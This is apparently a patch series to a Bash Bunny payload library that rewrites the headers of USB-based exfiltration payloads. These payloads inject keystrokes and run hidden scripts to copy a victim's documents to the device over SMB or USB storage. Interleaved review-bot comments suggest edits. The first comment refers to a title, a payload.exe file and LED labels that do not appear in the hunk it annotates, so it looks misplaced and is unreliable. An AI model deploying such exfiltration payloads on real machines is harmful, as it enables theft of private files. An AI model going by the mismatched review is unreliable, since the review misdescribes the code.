--- .../exfiltration/smb_exfiltrator/payload.txt | 53 +++++-------------- 1 file changed, 13 insertions(+), 40 deletions(-) diff --git a/payloads/library/exfiltration/smb_exfiltrator/payload.txt b/payloads/library/exfiltration/smb_exfiltrator/payload.txt index 4509d283..1db30d9a 100644 --- a/payloads/library/exfiltration/smb_exfiltrator/payload.txt +++ b/payloads/library/exfiltration/smb_exfiltrator/payload.txt 
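Review bot: The title is corrected to SmartFileExtract, but the description kept under it still talks about copying `payload.exe` from the root of the Bash Bunny and running it with `--startup`, which looks inherited from the ExecutableInstaller payload named in the old title. If this payload extracts files rather than installing an executable, the description should say so; please confirm against `e.cmd`. The header also has no `# Attack Modes:` field, and `Red: Attacking` should be checked against the LED calls, which are outside the hunk.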
@@ -4,47 +4,20 @@ # Author: Hak5Darren # Props: ImNatho, mike111b, madbuda # Version: 1.1 -# Category: Exfiltration -# Target: Windows XP SP3+ (Powershell) -# Attackmodes: HID, Ethernet +# Target: Windows XP +# Attack Modes: HID, RNDIS_ETHERNET +# Requires: Impacket Tool +# Description: Exfiltrates select files from users's documents folder via SMB. +# Liberated documents will reside in Bash Bunny loot directory under +# loot/smb_exfiltrator/HOSTNAME/DATE_TIME. Exfiltration options configured from included s.ps1 script. # -# CHANGELOG -# ========= -# Rewrite of the original SMB Exfiltrator payload with: -# - Faster copying, using robocopy multithreaded mode -# - Faster finish, using a EXFILTRATION_COMPLETE file -# - Offload logic to target PC for accurate date/time -# - Clears tracks by default without second run dialog -# - Test-Connection handling by ICMP (no lame sleeps) -# - Hidden powershell window by default -# -# REQUIREMENTS -# ============ -# Needs impacket to be copied to /tools/impacket and installed -# Option A: -# 1. Download impacket from https://github.com/CoreSecurity/impacket -# 2. Copy impacket folder to /tools on the Bash Bunny flash drive -# 3. Boot Bash Bunny into arming mode and connect to console via serial -# 4. Issue "python /tools/impacket/setup.py install" -# Option B: -# 1. Download impacket deb package -# 2. Copy impacket.deb to /tools on the Bash Bunny flash drive -# 3. Boot Bash Bunny into arming mode. Impacket will install automatically. 
-# -# LED STATUS -# ========== -# FAIL........Failed to find dependencies -# STAGE1......HID Stage -# STAGE2......Ethernet Stage -# SPECIAL.....Receiving Files -# CLEANUP.....Moving Liberated Files -# FINISH......Finished -# -# OPTIONS -# ======= -# Exfiltration options configured from included s.ps1 script - - +# LEDS: +# Red: Failed to find dependencies +# Yellow Single Blink: HID Stage +# Yellow Double Blink: Ethernet Stage +# Cyan: Receiving Files +# White: Moving Liberated Files +# Green: Finished ######## INITIALIZATION ######## REQUIRETOOL impacket From 342a2299c4accf669a4bd67f4795eedc053aa32c Mon Sep 17 00:00:00 2001 From: Marc Date: Fri, 5 Jul 2019 20:36:52 +0100 Subject: [PATCH 21/22] Cleanup: usb_exfiltrator: Update Payload Header --- .../exfiltration/usb_exfiltrator/payload.txt | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/payloads/library/exfiltration/usb_exfiltrator/payload.txt b/payloads/library/exfiltration/usb_exfiltrator/payload.txt index 44f50d59..cf8e96c0 100644 --- a/payloads/library/exfiltration/usb_exfiltrator/payload.txt +++ b/payloads/library/exfiltration/usb_exfiltrator/payload.txt @@ -3,14 +3,16 @@ # Title: USB Exfiltrator # Author: Hak5Darren # Version: 1.1 -# Target: Windows XP SP3+ +# Target: Windows XP # Props: Diggster, IMcPwn -# Category: Exfiltration -# -# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, -# which in turn executes e.cmd invisibly using i.vbs -# which in turn copies documents to the loot folder on the Bash Bunny. +# Description: Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, +# which in turn executes e.cmd invisibly using i.vbs +# which in turn copies documents to the loot folder on the Bash Bunny. # +# LEDS: +# Yellow Blink: Attacking +# Green: Finished + GET SWITCH_POSITION LED ATTACK ATTACKMODE HID STORAGE From 53aaa4d1c07da89b6313848e271c378b6d0135df Mon Sep 17 00:00:00 2001 
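Review bot: The impacket installation steps are deleted and replaced only by `# Requires: Impacket Tool`, yet the first statement after the header is `REQUIRETOOL impacket`. Going by the new LEDS list, a device without the tool ends in the red failure state, and the file no longer says how to resolve that. I would keep a short pointer such as `# Required Tools: impacket (copy impacket.deb to /tools on the Bash Bunny and boot into arming mode to install)`, which also matches the `Required Tools:` label used in the psh_DownloadExecSMB patch. In the new description, `users's documents folder` should be `user's Documents folder`.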
From: Marc Date: Fri, 5 Jul 2019 20:38:26 +0100 Subject: [PATCH 22/22] Cleanup: TwoStageMac: Update Payload Header --- payloads/library/exfiltration/TwoStageMac/payload.txt | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/payloads/library/exfiltration/TwoStageMac/payload.txt b/payloads/library/exfiltration/TwoStageMac/payload.txt index c6fb45c5..5d8186f5 100644 --- a/payloads/library/exfiltration/TwoStageMac/payload.txt +++ b/payloads/library/exfiltration/TwoStageMac/payload.txt @@ -1,12 +1,18 @@ # Title: TwoStageMac # Description: A simple two stage payload for OSX. Sample second stage # does some device profiling. +# # Author: Draxiom # Props: jdetmold # Version: 1.0 # Category: Exfiltration # Target: OSX # Attack Modes: HID, STORAGE +# LEDS: +# Magenta - Setup +# Yellow Blink - Attacking +# White - Clean up +# Green - Finished LED SETUP ATTACKMODE HID VID_0X05AC PID_0X021E STORAGE